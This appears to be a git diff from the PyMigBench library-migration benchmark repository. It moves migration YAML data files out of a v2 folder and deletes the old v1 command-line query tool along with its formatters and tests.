diff --git a/v2/data/migration/requests__aiohttp__usergeteam@userge-plugins__80a5434.yaml b/data/migration/requests__aiohttp__usergeteam@userge-plugins__80a5434.yaml
similarity index 100%
rename from v2/data/migration/requests__aiohttp__usergeteam@userge-plugins__80a5434.yaml
rename to data/migration/requests__aiohttp__usergeteam@userge-plugins__80a5434.yaml
diff --git a/v2/data/migration/restkit__requests__sporteasy@python-poeditor__5710859.yaml b/data/migration/restkit__requests__sporteasy@python-poeditor__5710859.yaml
similarity index 100%
rename from v2/data/migration/restkit__requests__sporteasy@python-poeditor__5710859.yaml
rename to data/migration/restkit__requests__sporteasy@python-poeditor__5710859.yaml
diff --git a/v2/data/migration/retrying__tenacity__intelai@inference-model-manager__71aff3a.yaml b/data/migration/retrying__tenacity__intelai@inference-model-manager__71aff3a.yaml
similarity index 100%
rename from v2/data/migration/retrying__tenacity__intelai@inference-model-manager__71aff3a.yaml
rename to data/migration/retrying__tenacity__intelai@inference-model-manager__71aff3a.yaml
diff --git a/v2/data/migration/retrying__tenacity__openstack@aodh__7587ab9.yaml b/data/migration/retrying__tenacity__openstack@aodh__7587ab9.yaml
similarity index 100%
rename from v2/data/migration/retrying__tenacity__openstack@aodh__7587ab9.yaml
rename to data/migration/retrying__tenacity__openstack@aodh__7587ab9.yaml
diff --git a/v2/data/migration/retrying__tenacity__openstack@ceilometer__380bb26.yaml b/data/migration/retrying__tenacity__openstack@ceilometer__380bb26.yaml
similarity index 100%
rename from v2/data/migration/retrying__tenacity__openstack@ceilometer__380bb26.yaml
rename to data/migration/retrying__tenacity__openstack@ceilometer__380bb26.yaml
diff --git a/v2/data/migration/retrying__tenacity__openstack@ironic-inspector__f4648fa.yaml b/data/migration/retrying__tenacity__openstack@ironic-inspector__f4648fa.yaml
similarity index 100%
rename from v2/data/migration/retrying__tenacity__openstack@ironic-inspector__f4648fa.yaml
rename to data/migration/retrying__tenacity__openstack@ironic-inspector__f4648fa.yaml
diff --git a/v2/data/migration/retrying__tenacity__openstack@ironic__b0607a2.yaml b/data/migration/retrying__tenacity__openstack@ironic__b0607a2.yaml
similarity index 100%
rename from v2/data/migration/retrying__tenacity__openstack@ironic__b0607a2.yaml
rename to data/migration/retrying__tenacity__openstack@ironic__b0607a2.yaml
diff --git a/v2/data/migration/retrying__tenacity__pokainc@cfn-cross-region-export__8d0ec68.yaml b/data/migration/retrying__tenacity__pokainc@cfn-cross-region-export__8d0ec68.yaml
similarity index 100%
rename from v2/data/migration/retrying__tenacity__pokainc@cfn-cross-region-export__8d0ec68.yaml
rename to data/migration/retrying__tenacity__pokainc@cfn-cross-region-export__8d0ec68.yaml
diff --git a/v2/data/migration/rpi.gpio__gpiozero__raspberrypilearning@push-button-stop-motion__0b6cdad.yaml b/data/migration/rpi.gpio__gpiozero__raspberrypilearning@push-button-stop-motion__0b6cdad.yaml
similarity index 100%
rename from v2/data/migration/rpi.gpio__gpiozero__raspberrypilearning@push-button-stop-motion__0b6cdad.yaml
rename to data/migration/rpi.gpio__gpiozero__raspberrypilearning@push-button-stop-motion__0b6cdad.yaml
diff --git a/v2/data/migration/ruamel.yaml__pyyaml__cloud-custodian@cloud-custodian__12e3e80.yaml b/data/migration/ruamel.yaml__pyyaml__cloud-custodian@cloud-custodian__12e3e80.yaml
similarity index 100%
rename from v2/data/migration/ruamel.yaml__pyyaml__cloud-custodian@cloud-custodian__12e3e80.yaml
rename to data/migration/ruamel.yaml__pyyaml__cloud-custodian@cloud-custodian__12e3e80.yaml
diff --git a/v2/data/migration/ruamel.yaml__pyyaml__microsoft@nni__b955ac9.yaml b/data/migration/ruamel.yaml__pyyaml__microsoft@nni__b955ac9.yaml
similarity index 100%
rename from v2/data/migration/ruamel.yaml__pyyaml__microsoft@nni__b955ac9.yaml
rename to data/migration/ruamel.yaml__pyyaml__microsoft@nni__b955ac9.yaml
diff --git a/v2/data/migration/simplejson__ujson__covid-projections@covid-data-model__95385ff.yaml b/data/migration/simplejson__ujson__covid-projections@covid-data-model__95385ff.yaml
similarity index 100%
rename from v2/data/migration/simplejson__ujson__covid-projections@covid-data-model__95385ff.yaml
rename to data/migration/simplejson__ujson__covid-projections@covid-data-model__95385ff.yaml
diff --git a/v2/data/migration/simplejson__ujson__zulip@zulip__222ef67.yaml b/data/migration/simplejson__ujson__zulip@zulip__222ef67.yaml
similarity index 100%
rename from v2/data/migration/simplejson__ujson__zulip@zulip__222ef67.yaml
rename to data/migration/simplejson__ujson__zulip@zulip__222ef67.yaml
diff --git a/v2/data/migration/slackclient__slack-sdk__alice-biometrics@petisco__9abf7b1.yaml b/data/migration/slackclient__slack-sdk__alice-biometrics@petisco__9abf7b1.yaml
similarity index 100%
rename from v2/data/migration/slackclient__slack-sdk__alice-biometrics@petisco__9abf7b1.yaml
rename to data/migration/slackclient__slack-sdk__alice-biometrics@petisco__9abf7b1.yaml
diff --git a/v2/data/migration/slackclient__slack-sdk__slackapi@python-slack-events-api__813214e.yaml b/data/migration/slackclient__slack-sdk__slackapi@python-slack-events-api__813214e.yaml
similarity index 100%
rename from v2/data/migration/slackclient__slack-sdk__slackapi@python-slack-events-api__813214e.yaml
rename to data/migration/slackclient__slack-sdk__slackapi@python-slack-events-api__813214e.yaml
diff --git a/v2/data/migration/slackclient__slack-sdk__slackapi@python-slack-sdk__5f4d92a.yaml b/data/migration/slackclient__slack-sdk__slackapi@python-slack-sdk__5f4d92a.yaml
similarity index 100%
rename from v2/data/migration/slackclient__slack-sdk__slackapi@python-slack-sdk__5f4d92a.yaml
rename to data/migration/slackclient__slack-sdk__slackapi@python-slack-sdk__5f4d92a.yaml
diff --git a/v2/data/migration/slackclient__slack-sdk__zulip@python-zulip-api__2d9cf64.yaml b/data/migration/slackclient__slack-sdk__zulip@python-zulip-api__2d9cf64.yaml
similarity index 100%
rename from v2/data/migration/slackclient__slack-sdk__zulip@python-zulip-api__2d9cf64.yaml
rename to data/migration/slackclient__slack-sdk__zulip@python-zulip-api__2d9cf64.yaml
diff --git a/v2/data/migration/smbus-cffi__smbus2__pimoroni@inky__cba3651.yaml b/data/migration/smbus-cffi__smbus2__pimoroni@inky__cba3651.yaml
similarity index 100%
rename from v2/data/migration/smbus-cffi__smbus2__pimoroni@inky__cba3651.yaml
rename to data/migration/smbus-cffi__smbus2__pimoroni@inky__cba3651.yaml
diff --git a/v2/data/migration/sphinx-rtd-theme__edx-sphinx-theme__edx@ecommerce__c1e120f.yaml b/data/migration/sphinx-rtd-theme__edx-sphinx-theme__edx@ecommerce__c1e120f.yaml
similarity index 100%
rename from v2/data/migration/sphinx-rtd-theme__edx-sphinx-theme__edx@ecommerce__c1e120f.yaml
rename to data/migration/sphinx-rtd-theme__edx-sphinx-theme__edx@ecommerce__c1e120f.yaml
diff --git a/v2/data/migration/sphinx-rtd-theme__guzzle-sphinx-theme__bashtage@arch__3620700.yaml b/data/migration/sphinx-rtd-theme__guzzle-sphinx-theme__bashtage@arch__3620700.yaml
similarity index 100%
rename from v2/data/migration/sphinx-rtd-theme__guzzle-sphinx-theme__bashtage@arch__3620700.yaml
rename to data/migration/sphinx-rtd-theme__guzzle-sphinx-theme__bashtage@arch__3620700.yaml
diff --git a/v2/data/migration/suds-py3__zeep__whynothugo@django-afip__827dd9f.yaml b/data/migration/suds-py3__zeep__whynothugo@django-afip__827dd9f.yaml
similarity index 100%
rename from v2/data/migration/suds-py3__zeep__whynothugo@django-afip__827dd9f.yaml
rename to data/migration/suds-py3__zeep__whynothugo@django-afip__827dd9f.yaml
diff --git a/v2/data/migration/suds__zeep__hbldh@pybankid__79e424c.yaml b/data/migration/suds__zeep__hbldh@pybankid__79e424c.yaml
similarity index 100%
rename from v2/data/migration/suds__zeep__hbldh@pybankid__79e424c.yaml
rename to data/migration/suds__zeep__hbldh@pybankid__79e424c.yaml
diff --git a/v2/data/migration/suds__zeep__openstate@open-raadsinformatie__b56e481.yaml b/data/migration/suds__zeep__openstate@open-raadsinformatie__b56e481.yaml
similarity index 100%
rename from v2/data/migration/suds__zeep__openstate@open-raadsinformatie__b56e481.yaml
rename to data/migration/suds__zeep__openstate@open-raadsinformatie__b56e481.yaml
diff --git a/v2/data/migration/tables__h5py__yoseflab@scvi__35163f0.yaml b/data/migration/tables__h5py__yoseflab@scvi__35163f0.yaml
similarity index 100%
rename from v2/data/migration/tables__h5py__yoseflab@scvi__35163f0.yaml
rename to data/migration/tables__h5py__yoseflab@scvi__35163f0.yaml
diff --git a/v2/data/migration/toml__tomlkit__greenbone@python-gvm__75a11ed.yaml b/data/migration/toml__tomlkit__greenbone@python-gvm__75a11ed.yaml
similarity index 100%
rename from v2/data/migration/toml__tomlkit__greenbone@python-gvm__75a11ed.yaml
rename to data/migration/toml__tomlkit__greenbone@python-gvm__75a11ed.yaml
diff --git a/v2/data/migration/toolz__cytoolz__nlesc@xtas__0dbf388.yaml b/data/migration/toolz__cytoolz__nlesc@xtas__0dbf388.yaml
similarity index 100%
rename from v2/data/migration/toolz__cytoolz__nlesc@xtas__0dbf388.yaml
rename to data/migration/toolz__cytoolz__nlesc@xtas__0dbf388.yaml
diff --git a/v2/data/migration/trollius__asyncio__popupcad@popupcad__d0526f6.yaml b/data/migration/trollius__asyncio__popupcad@popupcad__d0526f6.yaml
similarity index 100%
rename from v2/data/migration/trollius__asyncio__popupcad@popupcad__d0526f6.yaml
rename to data/migration/trollius__asyncio__popupcad@popupcad__d0526f6.yaml
diff --git a/v2/data/migration/twitter__tweepy__cloudbotirc@cloudbot__f824322.yaml
b/data/migration/twitter__tweepy__cloudbotirc@cloudbot__f824322.yaml similarity index 100% rename from v2/data/migration/twitter__tweepy__cloudbotirc@cloudbot__f824322.yaml rename to data/migration/twitter__tweepy__cloudbotirc@cloudbot__f824322.yaml diff --git a/v2/data/migration/twitter__tweepy__huntwelch@mongobot__bea008a.yaml b/data/migration/twitter__tweepy__huntwelch@mongobot__bea008a.yaml similarity index 100% rename from v2/data/migration/twitter__tweepy__huntwelch@mongobot__bea008a.yaml rename to data/migration/twitter__tweepy__huntwelch@mongobot__bea008a.yaml diff --git a/v2/data/migration/ufolib__fonttools__googlefonts@cu2qu__3543e4f.yaml b/data/migration/ufolib__fonttools__googlefonts@cu2qu__3543e4f.yaml similarity index 100% rename from v2/data/migration/ufolib__fonttools__googlefonts@cu2qu__3543e4f.yaml rename to data/migration/ufolib__fonttools__googlefonts@cu2qu__3543e4f.yaml diff --git a/v2/data/migration/ujson__rapidjson__htrc@htrc-feature-reader__7eae68a.yaml b/data/migration/ujson__rapidjson__htrc@htrc-feature-reader__7eae68a.yaml similarity index 100% rename from v2/data/migration/ujson__rapidjson__htrc@htrc-feature-reader__7eae68a.yaml rename to data/migration/ujson__rapidjson__htrc@htrc-feature-reader__7eae68a.yaml diff --git a/v2/data/migration/ujson__rapidjson__kinto@kinto__951dd25.yaml b/data/migration/ujson__rapidjson__kinto@kinto__951dd25.yaml similarity index 100% rename from v2/data/migration/ujson__rapidjson__kinto@kinto__951dd25.yaml rename to data/migration/ujson__rapidjson__kinto@kinto__951dd25.yaml diff --git a/v2/data/migration/ujson__rapidjson__murthylab@sleap__50721de.yaml b/data/migration/ujson__rapidjson__murthylab@sleap__50721de.yaml similarity index 100% rename from v2/data/migration/ujson__rapidjson__murthylab@sleap__50721de.yaml rename to data/migration/ujson__rapidjson__murthylab@sleap__50721de.yaml diff --git a/v2/data/migration/umsgpack__msgpack__logicaldash@lise__028d0b3.yaml b/data/migration/umsgpack__msgpack__logicaldash@lise__028d0b3.yaml similarity index 100% rename from v2/data/migration/umsgpack__msgpack__logicaldash@lise__028d0b3.yaml rename to data/migration/umsgpack__msgpack__logicaldash@lise__028d0b3.yaml diff --git a/v2/data/migration/unicodecsv__csv__cfpb@cfgov-refresh__b4beec3.yaml b/data/migration/unicodecsv__csv__cfpb@cfgov-refresh__b4beec3.yaml similarity index 100% rename from v2/data/migration/unicodecsv__csv__cfpb@cfgov-refresh__b4beec3.yaml rename to data/migration/unicodecsv__csv__cfpb@cfgov-refresh__b4beec3.yaml diff --git a/v2/data/migration/unicodecsv__csv__seed-platform@seed__119ba4b.yaml b/data/migration/unicodecsv__csv__seed-platform@seed__119ba4b.yaml similarity index 100% rename from v2/data/migration/unicodecsv__csv__seed-platform@seed__119ba4b.yaml rename to data/migration/unicodecsv__csv__seed-platform@seed__119ba4b.yaml diff --git a/v2/data/migration/unipath__pathlib__studentenportal@web__4842cff.yaml b/data/migration/unipath__pathlib__studentenportal@web__4842cff.yaml similarity index 100% rename from v2/data/migration/unipath__pathlib__studentenportal@web__4842cff.yaml rename to data/migration/unipath__pathlib__studentenportal@web__4842cff.yaml diff --git a/v2/data/migration/urllib3__requests__byrnereese@uphold-sdk-python__14fd085.yaml b/data/migration/urllib3__requests__byrnereese@uphold-sdk-python__14fd085.yaml similarity index 100% rename from v2/data/migration/urllib3__requests__byrnereese@uphold-sdk-python__14fd085.yaml rename to 
data/migration/urllib3__requests__byrnereese@uphold-sdk-python__14fd085.yaml diff --git a/v2/data/migration/urllib3__requests__canonical@cloud-init__0fc887d.yaml b/data/migration/urllib3__requests__canonical@cloud-init__0fc887d.yaml similarity index 100% rename from v2/data/migration/urllib3__requests__canonical@cloud-init__0fc887d.yaml rename to data/migration/urllib3__requests__canonical@cloud-init__0fc887d.yaml diff --git a/v2/data/migration/urllib3__requests__finish06@pyunifi__3e53482.yaml b/data/migration/urllib3__requests__finish06@pyunifi__3e53482.yaml similarity index 100% rename from v2/data/migration/urllib3__requests__finish06@pyunifi__3e53482.yaml rename to data/migration/urllib3__requests__finish06@pyunifi__3e53482.yaml diff --git a/v2/data/migration/urllib3__requests__mixpanel@mixpanel-python__e8a9330.yaml b/data/migration/urllib3__requests__mixpanel@mixpanel-python__e8a9330.yaml similarity index 100% rename from v2/data/migration/urllib3__requests__mixpanel@mixpanel-python__e8a9330.yaml rename to data/migration/urllib3__requests__mixpanel@mixpanel-python__e8a9330.yaml diff --git a/v2/data/migration/watchdog__pyinotify__onitu@onitu__04575c8.yaml b/data/migration/watchdog__pyinotify__onitu@onitu__04575c8.yaml similarity index 100% rename from v2/data/migration/watchdog__pyinotify__onitu@onitu__04575c8.yaml rename to data/migration/watchdog__pyinotify__onitu@onitu__04575c8.yaml diff --git a/v2/data/migration/webapp2__flask__c4rlo@vimhelp__7a5fadf.yaml b/data/migration/webapp2__flask__c4rlo@vimhelp__7a5fadf.yaml similarity index 100% rename from v2/data/migration/webapp2__flask__c4rlo@vimhelp__7a5fadf.yaml rename to data/migration/webapp2__flask__c4rlo@vimhelp__7a5fadf.yaml diff --git a/v2/data/migration/werkzeug__webob__dahlia@sqlalchemy-imageattach__7cd3ca5.yaml b/data/migration/werkzeug__webob__dahlia@sqlalchemy-imageattach__7cd3ca5.yaml similarity index 100% rename from v2/data/migration/werkzeug__webob__dahlia@sqlalchemy-imageattach__7cd3ca5.yaml rename to data/migration/werkzeug__webob__dahlia@sqlalchemy-imageattach__7cd3ca5.yaml diff --git a/v2/data/migration/wget__requests__noaa-oar-arl@monet__590936b.yaml b/data/migration/wget__requests__noaa-oar-arl@monet__590936b.yaml similarity index 100% rename from v2/data/migration/wget__requests__noaa-oar-arl@monet__590936b.yaml rename to data/migration/wget__requests__noaa-oar-arl@monet__590936b.yaml diff --git a/v2/data/migration/xlsxwriter__openpyxl__bcgov@gwells__472f336.yaml b/data/migration/xlsxwriter__openpyxl__bcgov@gwells__472f336.yaml similarity index 100% rename from v2/data/migration/xlsxwriter__openpyxl__bcgov@gwells__472f336.yaml rename to data/migration/xlsxwriter__openpyxl__bcgov@gwells__472f336.yaml diff --git a/v1/code/.gitignore b/v1/code/.gitignore deleted file mode 100644 index ed8ebf5..0000000 --- a/v1/code/.gitignore +++ /dev/null @@ -1 +0,0 @@ -__pycache__ \ No newline at end of file diff --git a/v1/code/.idea/.gitignore b/v1/code/.idea/.gitignore deleted file mode 100644 index 73f69e0..0000000 --- a/v1/code/.idea/.gitignore +++ /dev/null @@ -1,8 +0,0 @@ -# Default ignored files -/shelf/ -/workspace.xml -# Datasource local storage ignored files -/dataSources/ -/dataSources.local.xml -# Editor-based HTTP Client requests -/httpRequests/ diff --git a/v1/code/.idea/code.iml b/v1/code/.idea/code.iml deleted file mode 100644 index 6690b72..0000000 --- a/v1/code/.idea/code.iml +++ /dev/null @@ -1,13 +0,0 @@ - - - - - - - - - - - - \ No newline at end of file diff --git 
a/v1/code/.idea/inspectionProfiles/Project_Default.xml b/v1/code/.idea/inspectionProfiles/Project_Default.xml deleted file mode 100644 index ee20a26..0000000 --- a/v1/code/.idea/inspectionProfiles/Project_Default.xml +++ /dev/null @@ -1,7 +0,0 @@ - - - - \ No newline at end of file diff --git a/v1/code/.idea/inspectionProfiles/profiles_settings.xml b/v1/code/.idea/inspectionProfiles/profiles_settings.xml deleted file mode 100644 index 105ce2d..0000000 --- a/v1/code/.idea/inspectionProfiles/profiles_settings.xml +++ /dev/null @@ -1,6 +0,0 @@ - - - - \ No newline at end of file diff --git a/v1/code/.idea/misc.xml b/v1/code/.idea/misc.xml deleted file mode 100644 index 815ccfd..0000000 --- a/v1/code/.idea/misc.xml +++ /dev/null @@ -1,4 +0,0 @@ - - - - \ No newline at end of file diff --git a/v1/code/.idea/modules.xml b/v1/code/.idea/modules.xml deleted file mode 100644 index 23968dc..0000000 --- a/v1/code/.idea/modules.xml +++ /dev/null @@ -1,8 +0,0 @@ - - - - - - - - \ No newline at end of file diff --git a/v1/code/.idea/vcs.xml b/v1/code/.idea/vcs.xml deleted file mode 100644 index 6c0b863..0000000 --- a/v1/code/.idea/vcs.xml +++ /dev/null @@ -1,6 +0,0 @@ - - - - - - \ No newline at end of file diff --git a/v1/code/core/Arguments.py b/v1/code/core/Arguments.py deleted file mode 100644 index a3da330..0000000 --- a/v1/code/core/Arguments.py +++ /dev/null @@ -1,49 +0,0 @@ -import argparse - - -class Arguments: - def __init__(self, query: str, - data_type: str = None, - filters: list[str] = None, - output_format: str = None): - self.query = query - self.data_type = data_type - self.filters = parse_filters(filters) - self.output_format = output_format - - def __str__(self): - return str(self.__dict__) - - -def parse_filters(filter_list: list[str]): - if not filter_list: - return {} - dict = {} - for filter in filter_list: - attr, value = filter.split("=") - dict[attr] = value - - return dict - - -def build_arguments() -> Arguments: - parser = argparse.ArgumentParser(description="query PyMigBench") - parser.add_argument("query", nargs='?', default="summary", - choices=["summary", "count", "list", "detail", "s", "c", "l", "d"], - type=str.lower, - help="The query you want to run") - parser.add_argument("-d", "-dt", "--data-type", - help="The type of data that you want to fetch. " - "Summary does not accept any data type. " - "Other queries accept exactly one data type.", - choices=["lp", "mg"]) - parser.add_argument("-f", "--filters", required=False, nargs='+', - help="Additional filters. You can pass zero or more filters in <attribute>=<value>." 
- "Summary query ignores all filters") - parser.add_argument("-o", "--output-format", required=False, default="yaml", - type=str.lower, - choices=["yaml", "json"], - help="Output format") - - dict = vars(parser.parse_args()) - return Arguments(**dict) diff --git a/v1/code/core/Constants.py b/v1/code/core/Constants.py deleted file mode 100644 index 6ce48c0..0000000 --- a/v1/code/core/Constants.py +++ /dev/null @@ -1,9 +0,0 @@ -LibPairKey = "lp" -MigrationKey = "mg" - -DataTypeKeys = [LibPairKey, MigrationKey] - -DataTypeName = { - LibPairKey: "library pair", - MigrationKey: "migration" -} diff --git a/v1/code/core/Factory.py b/v1/code/core/Factory.py deleted file mode 100644 index e52500b..0000000 --- a/v1/code/core/Factory.py +++ /dev/null @@ -1,34 +0,0 @@ -from core.Arguments import Arguments -from db.Db import Db -from format.JSONFormat import JSONFormat -from format.YAMLFormat import YAMLFormat -from query.Detail import Detail -from query.Listing import Listing -from query.Count import Count -from query.Summary import Summary - - -def build_query(db: Db, arguments: Arguments): - query_name = arguments.query - if not query_name: - return None - query_name = query_name.lower() - query = None - if query_name.startswith("l"): - query = Listing - elif query_name.startswith("c"): - query = Count - elif query_name.startswith("d"): - query = Detail - elif query_name.startswith("s"): - query = Summary - - return query(db, arguments) - - -def build_output_format(output_format: str): - output_format = output_format.lower() - if output_format == "yaml": - return YAMLFormat() - if output_format == "json": - return JSONFormat() diff --git a/v1/code/core/to_dict.py b/v1/code/core/to_dict.py deleted file mode 100644 index 50280e8..0000000 --- a/v1/code/core/to_dict.py +++ /dev/null @@ -1,16 +0,0 @@ -# https://stackoverflow.com/a/7967905/887149 -def to_dict(obj): - if not hasattr(obj, "__dict__"): - return obj - result = {} - for key, val in obj.__dict__.items(): - if key.startswith("_"): - continue - element = [] - if isinstance(val, list): - for item in val: - element.append(to_dict(item)) - else: - element = to_dict(val) - result[key] = element - return result diff --git a/v1/code/db/Db.py b/v1/code/db/Db.py deleted file mode 100644 index 3f6d11c..0000000 --- a/v1/code/db/Db.py +++ /dev/null @@ -1,61 +0,0 @@ -import fnmatch -from pathlib import Path - -import yaml - -from core.Constants import MigrationKey, LibPairKey - -DataItem = dict[str, any] - - -class Db: - migrations: dict[str, DataItem] - lib_pairs: dict[str, DataItem] - _mapping: dict[str, dict[str, DataItem]] - - def __init__(self, data_root: str): - self.data_root = data_root - - def load(self): - self.migrations = self.load_items("migration") - self.lib_pairs = self.load_items("libpair") - self._mapping = { - MigrationKey: self.migrations, - LibPairKey: self.lib_pairs, - } - - def get_list(self, data_type: str): - return self._mapping[data_type].values() - - def filter_list(self, data_type: str, filters: dict[str, str]): - list = self.get_list(data_type) - for k, v in filters.items(): - list = [item for item in list if self.item_satisfies_filter(item, k, v)] - return list - - def get_item(self, data_type: str, id: str): - return self._mapping[data_type][id] - - def load_items(self, data_folder): - paths = Path(self.data_root, data_folder).glob("*.yaml") - items = (self.load_item(p) for p in paths) - dict = {item["id"]: item for item in items} - return dict - - @staticmethod - def item_satisfies_filter(item: DataItem, filter_key: str, 
filter_value: str): - prop = item[filter_key] - if isinstance(prop, list): - if not filter_value and not prop: - return True # If the user passes empty string and the list property is empty, consider it matching - return any(fnmatch.fnmatch(prop_item, filter_value) for prop_item in prop) - else: - return fnmatch.fnmatch(prop, filter_value) - pass - - @staticmethod - def load_item(yaml_path: Path): - with open(yaml_path) as f: - content = f.read() - dict: DataItem = yaml.safe_load(content) - return dict diff --git a/v1/code/db/__init__.py b/v1/code/db/__init__.py deleted file mode 100644 index 8b13789..0000000 --- a/v1/code/db/__init__.py +++ /dev/null @@ -1 +0,0 @@ - diff --git a/v1/code/format/JSONFormat.py b/v1/code/format/JSONFormat.py deleted file mode 100644 index 440ff2f..0000000 --- a/v1/code/format/JSONFormat.py +++ /dev/null @@ -1,9 +0,0 @@ -import json - -from format.OutputFormat import OutputFormat -from query.Result import Result - - -class JSONFormat(OutputFormat): - def format_impl(self, result: Result): - return json.dumps(result.items, indent=2, sort_keys=False, default=vars) diff --git a/v1/code/format/OutputFormat.py b/v1/code/format/OutputFormat.py deleted file mode 100644 index b296472..0000000 --- a/v1/code/format/OutputFormat.py +++ /dev/null @@ -1,18 +0,0 @@ -from abc import ABC, abstractmethod - -from query.Result import Result, ResultDisplayOption - - -class OutputFormat(ABC): - def format(self, result: Result): - count = f"{result.count} items" - if result.display_option == ResultDisplayOption.COUNT_ONLY: - return count - if result.display_option == ResultDisplayOption.DATA_ONLY: - return self.format_impl(result) - if result.display_option == ResultDisplayOption.COUNT_AND_DATA: - return f"{count}\n{self.format_impl(result)}\n{count}\n" - - @abstractmethod - def format_impl(self, result: Result): - pass diff --git a/v1/code/format/YAMLFormat.py b/v1/code/format/YAMLFormat.py deleted file mode 100644 index e12e550..0000000 --- a/v1/code/format/YAMLFormat.py +++ /dev/null @@ -1,9 +0,0 @@ -import yaml - -from format.OutputFormat import OutputFormat -from query.Result import Result - - -class YAMLFormat(OutputFormat): - def format_impl(self, result: Result): - return yaml.safe_dump(result.items, sort_keys=False) diff --git a/v1/code/format/__init__.py b/v1/code/format/__init__.py deleted file mode 100644 index 8b13789..0000000 --- a/v1/code/format/__init__.py +++ /dev/null @@ -1 +0,0 @@ - diff --git a/v1/code/pymigbench.py b/v1/code/pymigbench.py deleted file mode 100644 index 4a19ecf..0000000 --- a/v1/code/pymigbench.py +++ /dev/null @@ -1,23 +0,0 @@ -import os.path - -from core.Arguments import build_arguments, Arguments -from core.Factory import build_query, build_output_format -from db.Db import Db -from query.Query import Query - - -def run_query(args: Arguments): - db = Db(os.path.abspath("../data")) - db.load() - query: Query = build_query(db, args) - if query: - result = query.run() - format = build_output_format(args.output_format) - output = format.format(result) - print(output) - else: - print("error building the query") - - -if __name__ == '__main__': - run_query(build_arguments()) diff --git a/v1/code/query/Count.py b/v1/code/query/Count.py deleted file mode 100644 index f51b69d..0000000 --- a/v1/code/query/Count.py +++ /dev/null @@ -1,12 +0,0 @@ -from query.Query import Query -from query.Result import Result, ResultDisplayOption - - -class Count(Query): - def run(self): - if self.arguments.data_type is None: - raise ValueError("Please provide a datatype 
for count.") - - result = self.apply_filter() - - return Result(result, ResultDisplayOption.COUNT_ONLY) diff --git a/v1/code/query/Detail.py b/v1/code/query/Detail.py deleted file mode 100644 index 6e3c709..0000000 --- a/v1/code/query/Detail.py +++ /dev/null @@ -1,7 +0,0 @@ -from db.Db import DataItem -from query.Query import ListQuery - - -class Detail(ListQuery): - def format_item(self, item: DataItem): - return item diff --git a/v1/code/query/Listing.py b/v1/code/query/Listing.py deleted file mode 100644 index eb64562..0000000 --- a/v1/code/query/Listing.py +++ /dev/null @@ -1,7 +0,0 @@ -from db.Db import DataItem -from query.Query import ListQuery - - -class Listing(ListQuery): - def format_item(self, item: DataItem): - return item["id"] diff --git a/v1/code/query/Query.py b/v1/code/query/Query.py deleted file mode 100644 index 2ab5665..0000000 --- a/v1/code/query/Query.py +++ /dev/null @@ -1,30 +0,0 @@ -from abc import ABC, abstractmethod - -from core.Arguments import Arguments -from db.Db import Db, DataItem -from query.Result import Result, ResultDisplayOption - - -class Query(ABC): - def __init__(self, db: Db, arguments: Arguments): - self.db = db - self.arguments = arguments - - @abstractmethod - def run(self) -> Result: - pass - - def apply_filter(self): - items = self.db.filter_list(self.arguments.data_type, self.arguments.filters) - return items - - -class ListQuery(Query): - def run(self) -> Result: - items = self.apply_filter() - formatted_items = [self.format_item(item) for item in items] - return Result(formatted_items, ResultDisplayOption.COUNT_AND_DATA) - - @abstractmethod - def format_item(self, item: DataItem) -> object: - pass diff --git a/v1/code/query/Result.py b/v1/code/query/Result.py deleted file mode 100644 index 0d53ab1..0000000 --- a/v1/code/query/Result.py +++ /dev/null @@ -1,16 +0,0 @@ -from enum import Enum - -from db.Db import DataItem - - -class ResultDisplayOption(Enum): - COUNT_ONLY = "count_only" - DATA_ONLY = "data_only" - COUNT_AND_DATA = "count_and_data" - - -class Result: - def __init__(self, items: list[DataItem], display_option: ResultDisplayOption): - self.count = len(items) - self.items = items - self.display_option = display_option diff --git a/v1/code/query/Summary.py b/v1/code/query/Summary.py deleted file mode 100644 index 78ad42f..0000000 --- a/v1/code/query/Summary.py +++ /dev/null @@ -1,54 +0,0 @@ -from core.Constants import MigrationKey, LibPairKey -from db.Db import DataItem -from query.Query import Query -from query.Result import Result, ResultDisplayOption - - -class Summary(Query): - def run(self): - migs: list[DataItem] = self.db.get_list(MigrationKey) - all_lib_pairs: list[DataItem] = self.db.get_list(LibPairKey) - sources = {lp["source"] for lp in all_lib_pairs} - targets = {lp["target"] for lp in all_lib_pairs} - libs = sources.union(targets) - domains = {lp["domain"] for lp in all_lib_pairs} - repos = {mg["repo"] for mg in migs} - commits = {mg["commit"] for mg in migs} - lib_pairs_having_migs = {mg["pair_id"] for mg in migs} - - migs_having_code_changes = set() - lib_pairs_having_code_changes = set() - repos_having_code_changes = set() - commits_having_code_changes = set() - - file_count = 0 - segments_count = 0 - for mg in migs: - cc_in_mig = len(mg["code_changes"]) - if cc_in_mig: - migs_having_code_changes.add(mg["id"]) - lib_pairs_having_code_changes.add(mg["pair_id"]) - repos_having_code_changes.add(mg["repo"]) - commits_having_code_changes.add(mg["commit"]) - file_count += cc_in_mig - segments_count += 
sum(len(cc["lines"]) for cc in mg["code_changes"]) - - result = { - "analogous library pairs": len(all_lib_pairs), - "unique libraries": len(libs), - "unique source libraries": len(sources), - "unique target libraries": len(targets), - "unique library domains": len(domains), - "migrations": len(migs), - "client repositories having migrations": len(repos), - "library pairs having migrations": len(lib_pairs_having_migs), - "migration commits": len(commits), - "migrations having code changes": len(migs_having_code_changes), - "library pairs having code changes": len(lib_pairs_having_code_changes), - "client repositories having code changes": len(repos_having_code_changes), - "commits having code changes": len(commits_having_code_changes), - "modified files": file_count, - "modified code segments": segments_count - } - - return Result([result], ResultDisplayOption.DATA_ONLY) diff --git a/v1/code/requirements.txt b/v1/code/requirements.txt deleted file mode 100644 index 5ca893e..0000000 --- a/v1/code/requirements.txt +++ /dev/null @@ -1 +0,0 @@ -PyYAML~=6.0 \ No newline at end of file diff --git a/v1/code/tests/__init__.py b/v1/code/tests/__init__.py deleted file mode 100644 index 8b13789..0000000 --- a/v1/code/tests/__init__.py +++ /dev/null @@ -1 +0,0 @@ - diff --git a/v1/code/tests/misc_test.py b/v1/code/tests/misc_test.py deleted file mode 100644 index 355a710..0000000 --- a/v1/code/tests/misc_test.py +++ /dev/null @@ -1,33 +0,0 @@ -from core.Arguments import Arguments -from pymigbench import run_query - - -def test_detail_1(): - args = Arguments(query="detail", data_type="mg", filters=["target=aiohttp"], output_format="yaml") - run_query(args) - - -def test_detail_2(): - args = Arguments(query="detail", data_type="lp", filters=["target=aiohttp"], output_format="yaml") - run_query(args) - - -def test_detail_multiple_filters(): - args = Arguments(query="detail", data_type="mg", filters=["source=pyyaml", "target=ruamel.yaml"], - output_format="yaml") - run_query(args) - - -def test_count_1(): - args = Arguments(query="count", data_type="mg", filters=["target=aiohttp"], output_format="json") - run_query(args) - - 